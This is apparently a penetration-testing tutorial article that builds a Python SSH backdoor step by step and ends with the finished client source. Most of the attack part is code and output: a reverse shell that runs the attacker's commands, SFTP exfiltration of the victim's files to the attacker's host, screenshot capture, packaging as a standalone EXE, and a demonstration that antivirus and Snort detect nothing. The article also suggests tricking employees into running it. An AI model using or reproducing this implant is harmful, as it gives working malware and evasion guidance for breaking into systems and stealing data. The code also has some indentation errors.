Introduction

During penetration testing, sometimes you get stuck with a secure environment where all the servers and end-clients are fully patched, updated, firewalled, and have anti-virus software installed. Network firewall rules have been configured properly, and all internal clients are NATed to the Internet. A network-based IDS/IPS sensor is out there watching the traffic, and you still want to gain access!

In such a situation, client-side attack and having knowledge in programming are your best friends. Why is that? A client-side attack is considered a very dangerous threat, especially when it’s combined with a coordinated social engineering attack against employees who are not aware of the IT security field. For example, no matter what your security rules are, if you can trick the right person into opening the wrong (malicious) software, the system may get compromised.

In this article, we will create a simple but powerful and undetectable SSH backdoor written in Python with some built-in features like SFTP. At the final stage we will export this backdoor as a standalone and test it against online virus scanners as well as inside a simulated secure environment in VirtualBox.

Why Python? Python is a hacker’s language, it’s very simple to learn, runs over multiple platforms, and has a wealth of third-party libraries out there, making your job much easier.

After reading this article…

You will have a great example of forging Python in penetration testing and you may use or tune the code for a real world case. Plus you will be aware of the effectiveness of client-side attack and the importance of programming your own weapon where other tools will fail in such a tough scenario.

Lab Environment Overview

Reflecting a real world scenario, let’s take a look into our network diagram, which I built in VBox to illustrate a secure environment:

Attacker Machine
>IP address : 10.0.2.15/24
>OS: BackTrack 5 R3
>Python Version: 2.6

Victim Machine
>IP address : 192.168.1.15/24
>OS: Windows 7 SP1 32 bit
>Zone Alarm Firewall and anti-virus installed (free version)
>Python Version: 2.7 (installed for demonstration only)

Network Infrastructure
>Pfsense Firewall with SNORT IDS/IPS integrated service
>Pfsense is NATing the victim machine [192.168.1.15] to its WAN interface [10.0.2.1]
>2xVirtual switches created by VBox

Building the machines from scratch inside VBox is out of our scope in this article; however, I have to briefly show you the configuration in case someone would like to replicate the scenario.

Pfsense configuration

*For WAN (outside) interface [10.0.2.1], all incoming traffic is denied by default unless it’s initiated from inside [LAN interface], simply because pfSense is a stateful firewall.

*For LAN (inside) interface [192.168.1.0/24], most likely you will see that only the necessary ports are allowed in the outbound direction, based on business needs. In this case, I assumed 80,443, and 22 will be allowed.

*All our inside clients [192.168.1.0/24] will be NATed to the WAN interface, so they will appear as 10.0.2.1 to the attacker machine.

*SNORT is watching traffic on both directions (inbound and outbound) for pfSense LAN & WAN interfaces.

*SNORT signatures are updated at the time of writing this article.

Note: In addition to the default enabled SNORT rules, I’ve manually enabled all the rules for the below categories because they are heavily focusing on malicious activity initiated from $HOME_NET (where Win 7 located) to the outside world

$EXTERNAL_NET (where BT is located) :-

GPLv2_community.rules
Emerging-trojan.rules
Emerging-malware.rules

*Here we have Win 7 updated with history log:

*Zone alarm FW and anti-virus are up and running and its DB signature is updated as well.

Approach

1-How the Attack Works
2-Building the SSH Tunnel
3-Reverse Shell
4-SFTP
5-Write Your Own Custom Feature (Grabbing a Screenshot)
6-Code Wrap up into EXE
7-Verification

How the Attack Works

The main key to have a successful client-side attack is to gain an employee’s trust to download and open your malicious software. There are too many ways to do this; during reconnaissance phase, you may search around and see what topics this employee is interested in. Maybe he/she has a post on Facebook asking for free software to download YouTube videos! Get my point here? I will leave this to your imagination, as every penetration tester has his own way.

Once the victim opens ‘execute’ (your backdoor), a TCP SYN request will be initiated back to the attacker machine, which is supposed to be listening and waiting for incoming requests on port 22 to complete the TCP 3-way handshake and establish an SSH tunnel on the top of the TCP socket.

Inside this secure channel, we will transfer arbitrary commands to our victim and make it send the execution result back to us. Encryption is a great way to evade IDS/IPS sensors since they will be completely blind about the traffic type that passed on. Making a ‘reverse shell’ is also a well-known method to bypass FW rules, as it is most likely blocking all incoming connections, but you can’t block all outbound connections since they are mandatory for business needs.

Building the SSH Tunnel

Python has many third-party libraries that simplify SSH implementation and provide a high user level. I will use the Paramiko library, as it has fabulous features and allows us to program a simple client-server channel and much more!

Before proceeding, I recommend you take a look into a folder called “demos” inside the Paramiko bundle. Paramiko’s author has done a great job in explaining how to use Paramiko in multiple scenarios through demo scripts. Files we are interested in:

*demo_server.py : a demo for a simple SSH Server [BackTrack in our case]
*demo_simple.py : a demo for a simple SSH Client [Windows 7 in our case]
*demo_sftp.py : a demo for a simple SFTP Client [Windows 7 in our case]
*rforward.py : a demo for Reverse Port-Forwarding [Check challenge yourself section]

In this section, we will program the server & client-side and transfer simple strings over the SSH channel.

Server Side

import socket
import paramiko
import threading
import sys

host_key = paramiko.RSAKey(filename='/root/Desktop/test_rsa.key')

class Server (paramiko.ServerInterface):
   def _init_(self):
       self.event = threading.Event()
   def check_channel_request(self, kind, chanid):
       if kind == 'session':
           return paramiko.OPEN_SUCCEEDED
       return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
   def check_auth_password(self, username, password):
       if (username == 'root') and (password == 'toor'):
           return paramiko.AUTH_SUCCESSFUL
       return paramiko.AUTH_FAILED

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('10.0.2.15', 22))
    sock.listen(100)
    print '[+] Listening for connection ...'
    client, addr = sock.accept()
except Exception, e:
    print '[-] Listen/bind/accept failed: ' + str(e)
    sys.exit(1)
print '[+] Got a connection!'

try:
    t = paramiko.Transport(client)
    try:
        t.load_server_moduli()
    except:
        print '[-] (Failed to load moduli -- gex will be unsupported.)'
        raise
    t.add_server_key(host_key)
    server = Server()
    try:
        t.start_server(server=server)
    except paramiko.SSHException, x:
        print '[-] SSH negotiation failed.'

    chan = t.accept(20)
    print '[+] Authenticated!'
    print chan.recv(1024)
    chan.send('Yeah i can see this')

except Exception, e:
    print '[-] Caught exception: ' + str(e. class ) + ': ' + str(e)
    try:
        t.close()
    except:
        pass
    sys.exit(1)

The code starts with defining the location for RSA key, which be used to sign and verify

SSH2 data. I used the test_rsa.key that was packed inside the Paramiko bundle.

1 ‘class Server’ defines an interface for controlling the behavior of Paramiko in server mode, and includes necessary functions that handle the requests coming from the client-side. For example, ‘def check_auth_password‘ defines if a given username and password supplied by the client is correct during authentication.

def check_channel_request’ is called in our server when the client requests a channel. After authentication is complete, in this case we defined a session’ channel type only to be allowed, other types would be [PTY, Shell] but remember that we won’t need the client (victim) to establish (or even request) a PTY/Shell terminal back to us, right?

Next, we used ‘socket’, a built-in Python library for creating a TCP socket object named

2 ‘sock’, and assign some options like (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) allowing us to bind an IP address that previously connected and left the socket in TIME_WAIT. Then we defined that we are binding our 10.0.2.15 interface address on port 22 and listening for 100 connections (in fact we are only interested in one connection from our victim). sock.accept() return a socket object stored in a variable called
‘client’.

Finally we passed the ‘client’ socket object to ‘Transport’ class, which is responsible for

3 negotiating an encrypted session, authenticating, and then creating stream tunnels called channel ‘chan’ across the session. We interact with our victim inside a channel through ‘chan.send’ and ‘chan.recv’ functions.

If all went fine we should send (‘Yeah i can see this’) to the client and print out what the client has sent.

Client Side

In network programming, usually the client side is less complicated than the server side. You can notice this with four total lines needed to establish a channel.

import paramiko
import threading

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('10.0.2.15', username='root', password='toor')
chan = client.get_transport().open_session()
chan.send('Hey i am connected :) ')
print chan.recv(1024)
client.close

SSHClient() class takes care of most aspects of authenticating and opening channels.

Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

1 paramiko.AutoAddPolicy()
class automatically adds the hostname and server host key to the local ‘HostKeys‘ object and saves it, so we won’t worry about the notification message about recognizing the server key fingerprint that appears when you first connect to an SSH server. Then we define the IP address of our attacking machine [10.0.2.15 ] with login credentials.

‘client.get_transport().open_session()requests a new channel of type ‘session‘ from

2 the server (still remember def check_channel_request’ from the server code?). If all

goes fine, we should send (‘Hey i am connected :) ‘) to the server and print out what the server has sent.

Quick Test

Before moving on, I’ve already installed a Python compiler on the Windows 7 machine so we can quickly test our code, however in the last phase we will compile the whole code into single standalone EXE file which will be tested in our secure environment.

*Starting the server script

root@bt:~# python /root/Desktop/Server Part 1.py
[+] Listening for connection …

*Verify a listening port on our Backtrack

root@bt:~# netstat -antp | grep “22″
tcp 0 10.0.2.15:22 0.0.0.0:* LISTEN 1683/python

*Starting the client script

C:UsersHussamDesktop>python “Client Part 1.py”
Yeah i can see this

*Reviewing server side output

root@bt:~# python /root/Desktop/Server Part 1.py
[+] Listening for connection … [+] Got a connection!
[+] Authenticated!
Hey i am connected :)

Perfect, everything is working as expected we see the channel output on both sides as we programmed in the script.

Reverse Shell

Paramiko is not designed to be used for penetration testing, the author ‘as others do’ supposed that the client will execute commands on the server and this occurs via the ‘chan.exec_command(command)’ function. However it’s reversed in our scenario since the server (hacker) is the one who will execute commands remotely on the client (victim). To overcome this, we will initiate a subprocess on the client side, and based on commands we received from the server via chan.recv() ,our client will send the output back via chan.send().

Server Side

#Add the following code after ‘chan.send(‘Yeah i can see this’)’ from the previous server script.

while True:
    command= raw_input("Enter command: ").strip('n')
    chan.send(command)
    print chan.recv(1024) + 'n'

We just need to grab a command from the user via raw_input and send it to the client to execute it, then print out the result.

Client Side

import subprocess

while True:
    command = chan.recv(1024)
    try:
        CMD = subprocess.check_output(command, shell=True)
        chan.send(CMD)
    except Exception,e:
        chan.send(str(e))

‘subprocess.check_output’ execute the received command and return its output as a byte string to ‘CMD‘ variable, which gets transferred back to server. Note that we use exception handling with ‘subprocess.check_output’ because if the attacker mistyped a command, this will raise an exception and we will lose our shell. We definitely don’t want this.

Quick Test

*Start server script and then client script and issue some commands like ‘ipconfig,chdir’ to verify remote execution.

root@bt:~# python /root/Desktop/Server Part 2.py
[+] Listening for connection ...
[+] Got a connection!
[+] Authenticated! Hey i
am connected :) Enter
command: ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::9012:530:e307:c322%11
IPv4 Address. . . . . . . . . . . : 192.168.1.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Tunnel adapter isatap.{77D9EB79-91D3-45A9-A0BE-ED645CC08DF9}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :

Enter command: chdir
C:UsersHussamDesktop

Enter command: arp -a

Interface: 192.168.1.15 --- 0xb
 Internet Address  Physical Address   Type
 192.168.1.1       08-00-27-b3-a2-7d  dynamic
 192.168.1.255     ff-ff-ff-ff-ff-ff  static
 224.0.0.22        01-00-5e-00-00-16  static
 224.0.0.252       01-00-5e-00-00-fc  static
 239.255.255.250   01-00-5e-7f-ff-fa  static

Bingo! We have successfully executed commands remotely through the encrypted SSH channel. Let’s move on to do more actions.

SFTP

Transferring files with your victim becomes very handy, especially for post exploitation phases such as leaking sensitive documents or uploading software for pivoting. At this point we have multiple choices:

The worst: we can transfer files over the TCP socket, but this method may corrupt the file during transmission, especially if the file is large. As a matter of fact, this is why an entire protocol (FTP) was designed.

The best: to program an SFTP server using Paramiko, but SFTP server programming can be quite difficult.

The easiest: Fire up an OpenSSH server on a different hacking machine or bind it to a different NIC address. We need this because port 22 is reserved for our Python server on IP : 10.0.2.15.

SFTP Server

To avoid increasing code complexity on the server side, I will go for the last option and use OpenSSH with the following configuration:

root@bt:~# cat /etc/ssh/sshd_config
...
Port 22
ListenAddress 10.0.2.16
ChallengeResponseAuthentication no
Subsystem sftp internal-sftp
UsePAM no
...

SFTP Client

def sftp(local_path,name):
    try:
        transport = paramiko.Transport(('10.0.2.16', 22))
        transport.connect(username = 'root', password = 'toor')
    sftp = paramiko.SFTPClient.from_transport(transport)
    sftp.put(local_path, '/root/Desktop/SFTP-Upload/'+name)
    sftp.close()
    transport.close()
    return '[+] Done'
  except Exception,e:
    return str(e)

while True:
    command = chan.recv(1024)
    if 'grab' in command:
        grab,name,path = command.split('*')
        chan.send( sftp(path,name) )

Create a condition triggered by receiving a certain word grabto indicate that we need

1 to transfer a file from a victim machine. To transfer a file we need necessary parameters like file name, file path on victim machine, and the storing directory back on attacker side. The server has to send that information in a certain formula so we can split these parameters and pass it to our SFTP function.

In this case, I used asterisk ‘*’ to separate between these parameters. For example, on server side, if we send:

grab*photo*C:UsersHussamDesktopphoto.jpeg

using split function we can break the above sentence into 3 variables based on ‘*’

grab,name,path = command.split(‘*’)

>grab variable will contain grab string we received from the server

>name variable will contain the file name to be uploaded in server side, in this case it’s

photo

>path variable will contains the ‘photo’ path, in this case it’s

C:UsersHussamDesktopphoto.jpeg

Once SFTP function got the path and file name, it will initiate a new SSH session on port 22 back to our BackTrack machine. After authentication and establishing an SSH tunnel we can start transferring the photo using FTP protocol and it will be saved in a pre-created directory called ‘/root/Desktop/SFTP-Upload/’ , thanks to sftp.put(local_path, ‘/root/Desktop/SFTP-Upload/’+name)

If all went okay, SFTP function will return a ‘[+] Done’ string back to us through our previous channel, otherwise, it will print the exception occurred.

Quick test

root@bt:~# service ssh start
ssh start/running, process 1578

root@bt:~# netstat -antp | grep "22"
tcp       0      10.0.2.16.22            0.0.0.0:*              LISTEN     1578/sshd

root@bt:~# python /root/Desktop/Server Part 2.py
[+] Listening for connection ... [+] Got a connection!
[+] Authenticated!
Hey i am connected :) Enter command: dir Data Volume in drive C has no label.
Volume Serial Number is 1471-329C

Directory of C:UsersHussamDesktopData

11/20/2013	07:27 PM	<DIR>	.
11/20/2013	07:27 PM	<DIR>	..
11/01/2013	05:20 PM	0 important.txt
11/17/2013	01:17 AM	7,346 Nancy_Ajram.jpeg
11/13/2013	02:50 PM	98,743,826 Sales Report.pdf
3 File(s)     98,751,172 bytes
2 Dir(s) 14,744,477,696 bytes free

Enter command: grab*Nancy_Ajram*C:UsersHussamDesktopDataNancy_Ajram.jpeg
[+] Done
Enter command:

And we can see the image below in SFTP-Upload folder, voilà!

Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

Write Your Own Custom Feature (Grabbing a Screenshot )

In this part we will learn how to tune the previous script to add more functionality based on custom needs. Let’s try to replicate grabbing a screenshot option in Metasploit Meterpreter.

Client Side

from PIL import ImageGrab

def screenshot():
    try:
        im = ImageGrab.grab()
        im.save('C:UsersHussamDesktopscreenshot.png')
    except Exception,e:
        return str(e)
    return sftp('C:UsersHussamDesktopscreenshot.png','screenshot')

while True:

    command = chan.recv(1024)
    if 'grab' in command:
        grab,name,path = command.split('*')
        chan.send( sftp(path,name) )

    elif 'getscreen' in command:
    chan.send ( screenshot() )

1 Similar to what we’ve done in SFTP ‘grab‘, we appended another if statement in sequential

order that says “if we receive ‘getscreenfrom our server, we will call def screenshot()

function and send the result of this function back to server.”

2 def screenshot() function uses ‘ImageGrab class from Python Image Library (PIL) where it has a built in function to capture a screenshot, saving the output to C:UsersHussamDesktopscreenshot.png’ then we utilized SFTP function to transfer it for us.

Quick Test

root@bt:~# service ssh start
ssh start/running, process 1623
root@bt:~# python /root/Desktop/Server Part 2.py
[+] Listening for connection ... [+] Got a connection!
[+] Authenticated!
Hey i am connected :)
Enter command: getscreen
[+] Done

Enter command: chdir
C:UsersHussamDesktop

Checking our “Upload” directory we can see our new image over there:


Code Wrap up into EXE

There are multiple ways to convert a Python script into standalone EXE. We will use py2exe for this purpose.

Step 1: Grouping our client functions into a single file called “Client.py”

import paramiko
import threading
import subprocess
from PIL import ImageGrab

def sftp(local_path,name):
    try:
        transport = paramiko.Transport(('10.0.2.16', 22))
        transport.connect(username = 'root', password = 'toor')
        sftp = paramiko.SFTPClient.from_transport(transport)
        sftp.put(local_path, '/root/Desktop/SFTP-Upload/'+name)
        sftp.close()
        transport.close()
        return '[+] Done'
    except Exception,e:
        return str(e)

    def screenshot():
        try:
            im = ImageGrab.grab()
            im.save('C:UsersHussamDesktopscreenshot.png')
        except Exception,e:
            return str(e)
        return sftp('C:UsersHussamDesktopscreenshot.png','screenshot')

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect('10.0.2.15', username='root', password='toor')
    chan = client.get_transport().open_session()
    chan.send('Hey i am connected :) ')
    print chan.recv(1024)

    while True:
        command = chan.recv(1024)
        if 'grab' in command:
            grab,name,path = command.split('*')
            chan.send( sftp(path,name) )

        elif 'getscreen' in command:
            chan.send ( screenshot() )

    else:
         try:
            CMD = subprocess.check_output(command, shell=True)
            chan.send(CMD)
         except Exception,e:
            chan.send(str(e))

Step 2: Preparing “setup.py” script to specify which options do we need in our output

from distutils.core import setup
import py2exe , sys, os

setup(
    options = {'py2exe': {'bundle_files': 1}},

    windows = [{'script': "Client.py"}],
    zipfile = None,
)

{‘bundle_files’: 1} will bundle out script and its needed DLL libraries into single exe output as we don’t need zipfile (zipfile = None)

1 {‘bundle_files’: 1} will bundle out script and its needed DLL libraries into single exe output as we don’t need zipfile (zipfile = None)

Step 3: Firing up py2exe

C:UsersHussamDesktop>python setup.py py2exe

Our output will be in dist folder named Client.exe

Verification

Anti-virus Evasion

Now it’s show time. Uploading our Client.exe to virustotal online scanner, we got 0 detection.

https://www.virustotal.com/en/file/47e87746d742454cfd4aaa733c263ba25731e0e75cca
d6f0bd00cfa278520abe/analysis/1385136237/


SNORT Testing

Before running our standalone Backdoor into the victim machine, I have quickly crafted some packets initiated from the inside network (192.168.1.0/24) which triggers a couple SNORT signatures just to make sure that it’s working.

from scapy.all import *

packet = IP(src='192.168.1.15' , dst='8.8.8.8')
segment = UDP(dport=53)
payload =
'x33x33x01x00x00x01x00x00x00x00x00x00x07'+'counter'+'x05'+'yadro'+'
x02'+'ru'+'x00x00x01x00x01' rocket = packet/segment/payload
send(rocket)

packet = IP(src='192.168.1.15' , dst='10.0.2.15')
segment = ICMP()
payload = 'Echo This'
rocket = packet/segment/payload send(rocket)

The above code should trigger the below signatures from emerging-trojan.rules:

And fair enough, SNORT was able to address these packets and considered them malicious.

Note: I’ve cleared these logs before proceeding further.

Local AV & IDS Evasion

*Scanning our backdoor on Win 7 using Zone alarm AV and we got 0 infection.

*Setting up listeners on the attacker machine for last time:

root@bt:~# netstat -antp | grep “22″

tcp

0

0 10.0.2.15:22

0.0.0.0:*

LISTEN

1732/python

tcp

0

0 10.0.2.16:22

0.0.0.0:*

LISTEN

1723/sshd

*Opening the backdoor and testing our script functionality as standalone EXE:

root@bt:~# python /root/Desktop/Server Part 2.py
[+] Listening for connection ... [+] Got a connection!
[+] Authenticated!
Hey i am connected :)
Enter command: ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix  . :
Link-local IPv6 Address . . . . . : fe80::9012:530:e307:c322%11
IPv4 Address. . . . . . . . . . . : 192.168.1.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Tunnel adapter isatap.{77D9EB79-91D3-45A9-A0BE-ED645CC08DF9}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix  . :
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix  . :

Enter command: dir
Volume in drive C has no label.
Volume Serial Number is 1471-329C

Directory of C:UsersHussamDesktop

11/24/2013	07:42 PM	<DIR>	.
11/24/2013	07:42 PM	<DIR>	..
11/24/2013  07:35 PM        8,825,272 Client.exe
11/24/2013	01:32 AM	1,405 Client.py
11/01/2013	07:43 PM	13,335 cmd - Shortcut.lnk
11/20/2013	07:27 PM	<DIR>         Data
11/17/2013	12:52 AM	<DIR>          EXE
11/12/2013	11:14 PM	952 FreeSSHd.lnk
11/03/2013	09:51 PM	2,555 IDLE (Python GUI).lnk
11/12/2013	06:17 PM	61,440 nc.exe
11/23/2013	11:34 PM	345 New Text Document.txt
11/14/2013	08:42 PM	<DIR>         Nmap
11/04/2013	01:57 AM	311,296 plink.exe
11/14/2013	09:59 PM	78 portscan.bat
11/12/2013	09:13 PM	2,489,024 Procmon.exe
11/14/2013	10:19 PM	387,776 PsExec.exe
11/14/2013	10:22 PM	232,232 pslist.exe
11/04/2013	02:37 PM	495,616 putty.exe
1

Enter command: dir Data
1/17/2013  07:24 PM    <DIR>         pwdump7
11/17/2013  10:04 PM        5,589,154 Python-windows-privesc-check2.exe
11/24/2013  07:15 PM              245 setup.py
11/02/2013  08:35 PM              471 ShareVM (vboxsrv) (E) - Shortcut.lnk
11/06/2013  01:27 AM    <DIR>          SSH Bot
11/16/2013  11:45 PM            1,317 SSHClient2.py
11/02/2013  07:43 PM            3,059 Tripwire SecureCheq.lnk
11/17/2013  08:56 PM    <DIR>         upx391w
11/18/2013  06:10 PM    <DIR>         wce_v1.0
11/05/2013  06:43 PM            1,702 Wireshark.lnk
11/01/2013  09:06 PM            1,448 XAMPP Control Panel.lnk
11/16/2013  02:49 PM        2,465,360 zaSetupWeb_120_104_000.exe
09/01/2013  05:14 PM               853 �Torrent.lnk
    22 File(s)    20,884,935 bytes
     9 Dir(s)  14,805,999,616 bytes free

Enter command:
Volume in drive C has no label. Volume Serial Number is 1471-329C

Directory of C:UsersHussamDesktopData

11/20/2013	07:27 PM	<DIR>	.
11/20/2013	07:27 PM	<DIR>	..
11/01/2013	05:20 PM	0 important.txt
11/17/2013	01:17 AM	7,346 Nancy_Ajram.jpeg
11/13/2013	02:50 PM	98,743,826 Sales Report.pdf
    3 File(s)     98,751,172 bytes
    2 Dir(s)  14,805,999,616 bytes free

Enter command: grab*SalesRep*C:UsersHussamDesktopDataSales Report.pdf

[+] Done

Enter command: getscreenshot

[+] Done

So the results look exactly as they did in implementation phase, and wrapping into EXE

didn’t affect functionality.

*Connection Verification

C:UsersHussamDesktop>netstat -an | find "22"
TCP   192.168.1.15:49226	10.0.2.15:22	ESTABLISHED
TCP   192.168.1.15:49242	10.0.2.16:22	ESTABLISHED

root@bt:~# netstat -antp | grep "22"
tcp	0	0 10.0.2.15:22	10.0.2.1:57590	ESTABLISHED 1732/python
tcp	0	0 10.0.2.16:22	10.0.2.1:40539	ESTABLISHED 2218/sshd:  root@not

tcp

0

0 10.0.2.15:22

10.0.2.1:57590

ESTABLISHED 1732/python

tcp

0

0 10.0.2.16:22

10.0.2.1:40539

ESTABLISHED 2218/sshd:
root@not

*And the most important part is we got 0 alerts from SNORT on both LAN/WAN

Interfaces.

Wonderful :)

Challenge Yourself

Python Paramiko features have not finished yet. SSH supports a fancy feature called ‘reversed port forwarding’ which can be used for pivoting. Assume there’s a potential target that can be reached by Win 7 but not from our BackTrack directly; we can make Win 7 to tunnel our traffic back and forth this new target. Try to add this functionality to our Client.py.

Hint: Take a look into rforward.py demo script and use OpenSSH as your server.

Your comments encourages us to write, please leave one behind!

INTERESTED IN LEARNING MORE? CHECK OUT OUR ETHICAL HACKING TRAINING COURSE. FILL OUT THE FORM BELOW FOR A COURSE SYLLABUS AND PRICING INFORMATION.

References

Paramiko https://github.com/paramiko/paramiko/